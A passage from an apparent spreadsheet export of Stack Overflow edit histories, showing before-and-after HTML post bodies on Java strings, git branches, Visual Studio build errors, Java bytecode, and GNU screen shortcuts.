 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;a = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; StringBuilder()_x000D_
    .append(a)_x000D_
    .append(b)_x000D_
    .toString();_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The &lt;code&gt;concat&lt;/code&gt; method should be faster. However, with more strings the &lt;code&gt;StringBuilder&lt;/code&gt; method wins, at least in terms of performance.&lt;/p&gt; _x000D_
 &lt;p&gt; The source code of &lt;code&gt;String&lt;/code&gt; and &lt;code&gt;StringBuilder&lt;/code&gt; (and its package-private base class) is available in src.zip of the Sun JDK. You can see that you are building up a char array (resizing as necessary) and then throwing it away when you create the final &lt;code&gt;String&lt;/code&gt;. In practice memory allocation is surprisingly fast.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Malwinder Singh</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have a master and a development branch, both pushed to &lt;a href="http://en.wikipedia.org/wiki/GitHub" rel="nofollow noreferrer"&gt;GitHub&lt;/a&gt;. I've cloned, pulled, and fetched, but I remain unable to &lt;span class="diff-delete"&gt;see&lt;/span&gt; anything&lt;span class="diff-delete"&gt; locally&lt;/span&gt; other than the master branch &lt;span class="diff-delete"&gt;- &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;git branch&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; just lists &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;* master&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; even though I know there are other branches&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm sure I'm missing something obvious, but I have read the manual and I'm getting no joy at all.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have a master and a development branch, both pushed to &lt;a href="http://en.wikipedia.org/wiki/GitHub" rel="nofollow noreferrer"&gt;GitHub&lt;/a&gt;. I've cloned, pulled, and fetched, but I remain unable to &lt;span class="diff-add"&gt;get&lt;/span&gt; anything other than the master branch &lt;span class="diff-add"&gt;back&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm sure I'm missing something obvious, but I have read the manual and I'm getting no joy at all.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Peter Coulton</t>
  </si>
  <si>
    <t>Michael Durrant</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm using BlogEngine.NET (a fine, fine tool) and I was playing with the TinyMCE editor and noticed that there's a place for me to create a list of external links, but it has to be a javascript file:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;code&gt;external_link_list_url : "example_link_list.js"&lt;/code&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; this is great, of course, but the list of links I want to use needs to be generated dynamically from the database. This means that I need to create this JS file from the server on page load. Does anyone know of a way to do this? Ideally, I'd like to just overwrite this file each time the editor is accessed.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm using BlogEngine.NET (a fine, fine tool) and I was playing with the TinyMCE editor and noticed that there's a place for me to create a list of external links, but it has to be a javascript file:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;code&gt;external_link_list_url : "example_link_list.js"&lt;/code&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; this is great, of course, but the list of links I want to use needs to be generated dynamically from the database. This means that I need to create this JS file from the server on page load. Does anyone know of a way to do this? Ideally, I'd like to just overwrite this file each time the editor is accessed.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Thanks!&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jason</t>
  </si>
  <si>
    <t>e-sushi</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; There is no syntax in C++ nor C# for the second method you mentioned.&lt;/p&gt; _x000D_
 &lt;p&gt; There's nothing wrong with your first method. If however you have very big ranges, just use a series of if statements.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; If you really wanted to try hard, you could create a range class in C# and test for that in each case statement.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; There is no syntax in C++ nor C# for the second method you mentioned.&lt;/p&gt; _x000D_
 &lt;p&gt; There's nothing wrong with your first method. If however you have very big ranges, just use a series of if statements.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Brian R. Bondy</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;You&lt;/span&gt; need to specify the actual type you will be handling&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; so it would be&lt;/span&gt; something like...&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public static string GetDefaultPageTitle(this ViewPage&amp;lt;YourSpecificType&amp;gt; v)_x000D_
{_x000D_
  ..._x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Note intellisense will then only display the &lt;span class="diff-delete"&gt;instance&lt;/span&gt; method when you declare your (in this case) ViewPage with the matching type.&lt;/p&gt; _x000D_
 &lt;p&gt; Also, best not to use the System.Web.Mvc namespace, I know its convenient to not have to include your namespace in the usings section, but its far more maintainable if you create your own extensions namespace for your extension functions.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;If you want the extension to only be available for the specified type you simply just&lt;/span&gt; need to specify the actual type you will be handling&lt;/p&gt; _x000D_
 &lt;p&gt; something like...&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public static string GetDefaultPageTitle(this ViewPage&amp;lt;YourSpecificType&amp;gt; v)_x000D_
{_x000D_
  ..._x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Note intellisense will then only display the &lt;span class="diff-add"&gt;extension&lt;/span&gt; method when you declare your (in this case) ViewPage with the matching type.&lt;/p&gt; _x000D_
 &lt;p&gt; Also, best not to use the System.Web.Mvc namespace, I know its convenient to not have to include your namespace in the usings section, but its far more maintainable if you create your own extensions namespace for your extension functions.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Tim Jarvis</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; This is more of a work-around than a true solution. I first posted this work-around on the Nevrona newsgroup (Group=nevrona.public.rave.developer.delphi.rave; Subject="Are you suffering from the Rave Endless Loop bug?: Work-around announced."; Date=13/11/2006 7:06 PM)&lt;/p&gt; _x000D_
 &lt;p&gt; So here is my solution. It is more of a work-around than a good long-term solution, and I hope that Nevrona will give this issue some serious attention in the near future.&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt; Given your particular report layout, count the maximum number of rows per page. Let us say that this is 40.&lt;/li&gt; _x000D_
  &lt;li&gt; Set up a counter to count the rows within the page (as opposed to rows within the whole report). You could do this either by event script or by a CalcTotal component.&lt;/li&gt; _x000D_
  &lt;li&gt; Define an OnBeforePrint scripted event handler for the main data band.&lt;/li&gt; _x000D_
  &lt;li&gt; In this event handler set the FinishNewPage property of the main data band to be True when the row-per-page count is one or two below the max (in our example, this would be 38). And set it to False in all other cases. The effect of this is to give every page a non-zero number of widows (in this case 1..38), thus avoiding the condition that gives rise to the Rave Endless loop problem.&lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Sean B. Durkin</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm working on VS 2005 and something has gone wrong on my machine. Suddenly, out of the blue, I can no longer build deployment files. The build message is:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;ERROR: An error occurred generating a bootstrapper: Invalid syntax._x000D_
ERROR: General failure building bootstrapper_x000D_
ERROR: Unrecoverable build error_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; A quick Google search brings up the last 2 lines, but nobody in cyberspace has ever reported the first message before. (Hooray! I'm first at SOMETHING on the 'net!)&lt;/p&gt; _x000D_
 &lt;p&gt; Other machines in my office are able to do the build. My machine has been able to do the build before. I have no idea what changed that upset the delicate balance of things on my box. I have also tried all the traditional rituals i.e. closing Visual Studio, blowing away all the bin and obj folders, rebooting, etc. to no avail.&lt;/p&gt; _x000D_
 &lt;p&gt; For simplicity's sake, I created a little "Hello World" app with a deployment file. Herewith the build output:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;------ Build started: Project: HelloWorld, Configuration: Debug Any CPU ------_x000D_
HelloWorld -&amp;gt; C:\Vault\Multi Client\Tests\HelloWorld\HelloWorld\bin\Debug\HelloWorld.exe_x000D_
------ Starting pre-build validation for project 'HelloWorldSetup' ------_x000D_
------ Pre-build validation for project 'HelloWorldSetup' completed ------_x000D_
------ Build started: Project: HelloWorldSetup, Configuration: Debug ------_x000D_
Building file 'C:\Vault\Multi Client\Tests\HelloWorld\HelloWorldSetup\Debug\HelloWorldSetup.msi'..._x000D_
ERROR: An error occurred generating a bootstrapper: Invalid syntax._x000D_
ERROR: General failure building bootstrapper_x000D_
ERROR: Unrecoverable build error_x000D_
========== Build: 1 succeeded or up-to-date, 1 failed, 0 skipped ==========_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I am using:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; MS Visual Studio 2005 Version 8.0.50727.762 (SP .050727-7600)&lt;/li&gt; _x000D_
  &lt;li&gt;.NET Framework Version 2.0.50727&lt;/li&gt; _x000D_
  &lt;li&gt; OS: Windows XP Pro&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Again, I have no idea what changed. All I know is that one day everything was working fine; the next day I suddenly can't do any deployment builds at all (though all other projects still compile fine).&lt;/p&gt; _x000D_
 &lt;p&gt; I posted this on MSDN about a month ago, and they don't seem to know what's going on, either. See &lt;a href="http://tinyurl.com/6mo6cb" rel="nofollow noreferrer"&gt;http://tinyurl.com/6mo6cb&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Anyone have any idea what this is about?&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks! Shaul&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; @Brad Wilson: Thanks, but if you read my original post, you'll see that I already did start an entire solution from scratch, and that didn't help.&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; @deemer: I went through all the pain of uninstalling and reinstalling, even though I didn't have your recommended reading while waiting... and - Misery! - still the same error reappears. It seems that my computer has somehow been branded as unsuitable for doing deployment builds ever again.&lt;/p&gt; _x000D_
 &lt;p&gt; Does anyone have any idea where this "secret switch" might be? HELP!!! :-o&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;SOLUTION!&lt;/span&gt;&lt;/strong&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; Thanks to Michael Bleifer of Microsoft support - I installed .NET 2.0 SP1, and the problem was solved!&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm working on VS 2005 and something has gone wrong on my machine. Suddenly, out of the blue, I can no longer build deployment files. The build message is:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;ERROR: An error occurred generating a bootstrapper: Invalid syntax._x000D_
ERROR: General failure building bootstrapper_x000D_
ERROR: Unrecoverable build error_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; A quick Google search brings up the last 2 lines, but nobody in cyberspace has ever reported the first message before. (Hooray! I'm first at SOMETHING on the 'net!)&lt;/p&gt; _x000D_
 &lt;p&gt; Other machines in my office are able to do the build. My machine has been able to do the build before. I have no idea what changed that upset the delicate balance of things on my box. I have also tried all the traditional rituals i.e. closing Visual Studio, blowing away all the bin and obj folders, rebooting, etc. to no avail.&lt;/p&gt; _x000D_
 &lt;p&gt; For simplicity's sake, I created a little "Hello World" app with a deployment file. Herewith the build output:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;------ Build started: Project: HelloWorld, Configuration: Debug Any CPU ------_x000D_
HelloWorld -&amp;gt; C:\Vault\Multi Client\Tests\HelloWorld\HelloWorld\bin\Debug\HelloWorld.exe_x000D_
------ Starting pre-build validation for project 'HelloWorldSetup' ------_x000D_
------ Pre-build validation for project 'HelloWorldSetup' completed ------_x000D_
------ Build started: Project: HelloWorldSetup, Configuration: Debug ------_x000D_
Building file 'C:\Vault\Multi Client\Tests\HelloWorld\HelloWorldSetup\Debug\HelloWorldSetup.msi'..._x000D_
ERROR: An error occurred generating a bootstrapper: Invalid syntax._x000D_
ERROR: General failure building bootstrapper_x000D_
ERROR: Unrecoverable build error_x000D_
========== Build: 1 succeeded or up-to-date, 1 failed, 0 skipped ==========_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I am using:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; MS Visual Studio 2005 Version 8.0.50727.762 (SP .050727-7600)&lt;/li&gt; _x000D_
  &lt;li&gt;.NET Framework Version 2.0.50727&lt;/li&gt; _x000D_
  &lt;li&gt; OS: Windows XP Pro&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Again, I have no idea what changed. All I know is that one day everything was working fine; the next day I suddenly can't do any deployment builds at all (though all other projects still compile fine).&lt;/p&gt; _x000D_
 &lt;p&gt; I posted this on MSDN about a month ago, and they don't seem to know what's going on, either. See &lt;a href="http://tinyurl.com/6mo6cb" rel="nofollow noreferrer"&gt;http://tinyurl.com/6mo6cb&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Anyone have any idea what this is about?&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks! Shaul&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; @Brad Wilson: Thanks, but if you read my original post, you'll see that I already did start an entire solution from scratch, and that didn't help.&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; @deemer: I went through all the pain of uninstalling and reinstalling, even though I didn't have your recommended reading while waiting... and - Misery! - still the same error reappears. It seems that my computer has somehow been branded as unsuitable for doing deployment builds ever again.&lt;/p&gt; _x000D_
 &lt;p&gt; Does anyone have any idea where this "secret switch" might be? HELP!!! :-o&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Shaul Behr</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The META-INF folder is the home for the &lt;a href="http://web.archive.org/web/20120626125503/http://java.sun.com:80/developer/Books/javaprogramming/JAR/basics/manifest.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;MANIFEST.MF&lt;/span&gt;&lt;/a&gt; file. This file contains meta data about the contents of the JAR. For example, there is an entry called Main-Class that specifies the name of the Java class with the static main() for executable JAR files.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The META-INF folder is the home for the &lt;a href="http://java.sun.com/developer/Books/javaprogramming/JAR/basics/manifest.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;MANIFEST.MF&lt;/span&gt;&lt;/a&gt; file. This file contains meta data about the contents of the JAR. For example, there is an entry called Main-Class that specifies the name of the Java class with the static main() for executable JAR files.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Brian Matthews</t>
  </si>
  <si>
    <t>Csa77</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; When creating the &lt;code&gt;id&lt;/code&gt; attributes for HTML elements, what rules are there for the value?&lt;span class="diff-delete"&gt;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lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; When creating the &lt;code&gt;id&lt;/code&gt; attributes for HTML elements, what rules are there for the value?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Taryn</t>
  </si>
  <si>
    <t>m87</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;   &lt;/span&gt;// class version 49.0 (49)_x000D_
// access flags 33_x000D_
public class Container$Item {_x000D_
_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  // compiled from: Container.java_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  // access flags 1_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  public INNERCLASS Container$Item Container Item_x000D_
_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  // access flags 0_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  Object data_x000D_
_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  // access flags 4112_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  final Container this$0_x000D_
_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  // access flags 1_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  public getContainer(): Container_x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;   L0_x000D_
    LINENUMBER 7 L0_x000D_
    ALOAD 0: this_x000D_
    GETFIELD Container$Item.this$0: Container_x000D_
    ARETURN_x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;   L1_x000D_
    LOCALVARIABLE this Container$Item L0 L1 0_x000D_
    MAXSTACK = 1_x000D_
    MAXLOCALS = 1_x000D_
_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  // access flags 1_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  public&lt;span class="diff-delete"&gt; &amp;lt;&lt;/span&gt; &lt;span class="diff-delete"&gt;init &amp;gt; &lt;/span&gt;(Container,&lt;span class="diff-delete"&gt; &lt;/span&gt;Object): void_x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;   L0_x000D_
    LINENUMBER 12 L0_x000D_
    ALOAD 0: this_x000D_
    ALOAD 1_x000D_
    PUTFIELD Container$Item.this$0: Container_x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;   L1_x000D_
    LINENUMBER 10 L1_x000D_
    ALOAD 0: this_x000D_
    INVOKESPECIAL Object.&lt;span class="diff-delete"&gt; &amp;lt; init &amp;gt; &lt;/span&gt;(): void_x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;   L2_x000D_
    LINENUMBER 11 L2_x000D_
    ALOAD 0: this_x000D_
    ALOAD 2: data_x000D_
    PUTFIELD Container$Item.data: Object_x000D_
    RETURN_x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;   L3_x000D_
    LOCALVARIABLE this Container$Item L0 L3 0_x000D_
    LOCALVARIABLE data Object L0 L3 2_x000D_
    MAXSTACK = 2_x000D_
    MAXLOCALS = 3_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;// class version 49.0 (49)_x000D_
// access flags 33_x000D_
public class Container$Item {_x000D_
_x000D_
  // compiled from: Container.java_x000D_
  // access flags 1_x000D_
  public INNERCLASS Container$Item Container Item_x000D_
_x000D_
  // access flags 0_x000D_
  Object data_x000D_
_x000D_
  // access flags 4112_x000D_
  final Container this$0_x000D_
_x000D_
  // access flags 1_x000D_
  public getContainer()&lt;span class="diff-add"&gt; &lt;/span&gt;: Container_x000D_
   L0_x000D_
    LINENUMBER 7 L0_x000D_
    ALOAD 0: this_x000D_
    GETFIELD Container$Item.this$0&lt;span class="diff-add"&gt; &lt;/span&gt;: Container_x000D_
    ARETURN_x000D_
   L1_x000D_
    LOCALVARIABLE this Container$Item L0 L1 0_x000D_
    MAXSTACK = 1_x000D_
    MAXLOCALS = 1_x000D_
_x000D_
  // access flags 1_x000D_
  public &lt;span class="diff-add"&gt;&amp;lt;init&amp;gt;&lt;/span&gt;(Container,Object)&lt;span class="diff-add"&gt; &lt;/span&gt;: void_x000D_
   L0_x000D_
    LINENUMBER 12 L0_x000D_
    ALOAD 0: this_x000D_
    ALOAD 1_x000D_
    PUTFIELD Container$Item.this$0&lt;span class="diff-add"&gt; &lt;/span&gt;: Container_x000D_
   L1_x000D_
    LINENUMBER 10 L1_x000D_
    ALOAD 0: this_x000D_
    INVOKESPECIAL Object.&lt;span class="diff-add"&gt;&amp;lt;init&amp;gt;&lt;/span&gt;()&lt;span class="diff-add"&gt; &lt;/span&gt;: void_x000D_
   L2_x000D_
    LINENUMBER 11 L2_x000D_
    ALOAD 0: this_x000D_
    ALOAD 2: data_x000D_
    PUTFIELD Container$Item.data&lt;span class="diff-add"&gt; &lt;/span&gt;: Object_x000D_
    RETURN_x000D_
   L3_x000D_
    LOCALVARIABLE this Container$Item L0 L3 0_x000D_
    LOCALVARIABLE data Object L0 L3 2_x000D_
    MAXSTACK = 2_x000D_
    MAXLOCALS = 3_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>jrudolph</t>
  </si>
  <si>
    <t>Nikhil Agrawal</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've been using screen for over 10 years and probably use less than half the features. So it's definitely not necessary to learn all its features right away (and I wouldn't recommend trying). My day-to-day commands are:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;^A ^W&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; - window list, where am I&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;^A ^C&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; - create new window&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;^A space&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; or &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;^A n&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; - next window&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;^A basckspace&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; or &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;^A p&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; - previous window&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;^A ^A&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; - switch to previous screen (toggle)&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;^A [0-9]&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; - go to window [0-9]&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;^A '{10..n}&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; - go to window 11..n&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;^A esc&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; or &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;^A [&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; - copy mode, which I use for scrollback&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; I think that's it. I sometimes use the split screen features, but certainly not daily. The other tip is if screen seems to have locked up because you hit some random key combination by accident, do both ^Q and ^A ^Q to try to unlock it.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've been using screen for over 10 years and probably use less than half the features. So it's definitely not necessary to learn all its features right away (and I wouldn't recommend trying). My day-to-day commands are:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;^A ^W - window list, where am I_x000D_
^A ^C - create new window_x000D_
^A space - next window_x000D_
^A p - previous window_x000D_
^A ^A - switch to previous screen (toggle)_x000D_
^A [0-9] - go to window [0-9]_x000D_
^A esc - copy mode, which I use for scrollback_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I think that's it. I sometimes use the split screen features, but certainly not daily. The other tip is if screen seems to have locked up because you hit some random key combination by accident, do both ^Q and ^A ^Q to try to unlock it.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Greg Hewgill</t>
  </si>
  <si>
    <t>fejese</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What is GNU Screen? Great!&lt;/p&gt; _x000D_
 &lt;p&gt; Erm, a slightly more useful answer: it allows you to run multiple console applications, or commands, in one terminal. Kind of like a tabbed terminal emulator. In fact, that's exactly what it is (just not done with the regular GUI toolkits)&lt;/p&gt; _x000D_
 &lt;p&gt; Why is it so great? Simple, you can run a program in a screen session (Run &lt;code&gt;screen&lt;/code&gt; and it runs your default shell, run &lt;code&gt;screen myapp&lt;/code&gt; and it runs myapp in the session), hit &lt;kbd&gt;ctrl&lt;/kbd&gt;+&lt;kbd&gt;a&lt;/kbd&gt; (the screen control sequence) and then press &lt;kbd&gt;d&lt;/kbd&gt; (&lt;kbd&gt;ctrl&lt;/kbd&gt;+&lt;kbd&gt;a&lt;/kbd&gt;,&lt;kbd&gt;d&lt;/kbd&gt;) to detach.&lt;/p&gt; _x000D_
 &lt;p&gt; The program keeps running in the background, &lt;em&gt;but&lt;/em&gt;, unlike doing &lt;code&gt;mycmd &amp;amp;&lt;/code&gt;, you can run &lt;code&gt;screen -r&lt;/code&gt; to reattach the session, and everything is as you left it. You can send input to the command, if it's a curses UI, everything still works just like if it were a "real" terminal.&lt;/p&gt; _x000D_
 &lt;p&gt; It's very popular with console IRC clients - you can run (say) &lt;code&gt;screen irssi&lt;/code&gt; and reattach the session from anywhere you can SSH from.&lt;/p&gt; _x000D_
 &lt;p&gt; A few useful commands:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;kbd&gt;ctrl&lt;/kbd&gt;+&lt;kbd&gt;a&lt;/kbd&gt;, &lt;kbd&gt;c&lt;/kbd&gt; to make a new virtual terminal (or "window") in the session&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;kbd&gt;ctrl&lt;/kbd&gt;+&lt;kbd&gt;a&lt;/kbd&gt;, &lt;kbd&gt;n&lt;/kbd&gt; and &lt;kbd&gt;ctrl&lt;/kbd&gt;+&lt;kbd&gt;a&lt;/kbd&gt;, &lt;kbd&gt;p&lt;/kbd&gt; to cycle through multiple windows&lt;/li&gt; _x000D_
